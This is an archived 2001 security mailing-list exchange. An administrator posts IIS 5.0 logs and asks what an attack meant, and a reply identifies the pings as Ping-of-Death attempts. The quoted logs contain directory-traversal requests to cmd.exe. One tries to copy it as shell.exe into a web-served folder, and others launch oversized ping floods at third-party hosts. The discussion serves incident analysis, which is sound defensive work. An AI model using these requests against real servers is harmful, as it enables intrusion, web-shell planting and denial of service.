those pings are Ping-of death attempts with TOS (Type Of Service) options - I don't know why options were used - maybe this increases the possibility of crashing destination machine... myrddin_eat_private wrote: > > Would like someone to help me understand what is going on here... The 502 > error at the end end of these entries would indcicate failures, wouldn't > they? I've been all through the logs on this box, and even thought at every > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe > shows a 502, it is there. > > I'm looking at the times on the log entries and guessing that this was a > manual attack. > > Also, can someone please explain what is being attempted with these pings? > aaa.aaa.aaa.aaa > bbb.bbb.bbb.bbb > ccc.ccc.ccc.ccc.ccc > ddd.ddd.ddd.ddd.ddd > are all unique addresses. > > #Software: Microsoft Internet Information Services 5.0 > #Version: 1.0 > #Date: 2001-06-19 18:44:15 > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs- > uri-query sc-status cs(User-Agent) > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 - > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 - > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd > 502 - > Free, encrypted, secure Web-based email at www.hushmail.com > > ------------------------------------------------------------------------ > > ---------------------------------------------------------------------------- > > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: > > http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:09 PDT